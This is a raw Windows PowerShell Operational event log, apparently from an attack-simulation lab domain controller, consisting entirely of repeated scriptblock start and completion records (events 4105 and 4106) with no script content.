OpCode=On create calls
RecordNumber=1468215
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468214
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468213
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468212
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468211
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468210
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468209
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468208
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468207
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468206
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468205
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468204
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468203
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468202
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468201
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468200
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468199
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468198
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468197
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468196
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468195
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468194
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468193
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468192
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468191
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468190
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468189
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468188
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468187
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468186
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468185
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468184
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468183
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468182
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468181
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468180
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468179
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468178
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468177
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468176
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468175
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468174
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468173
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468172
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468171
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468170
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468169
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468168
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468167
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468166
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468165
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468164
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468163
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468162
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468161
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468160
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:10 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
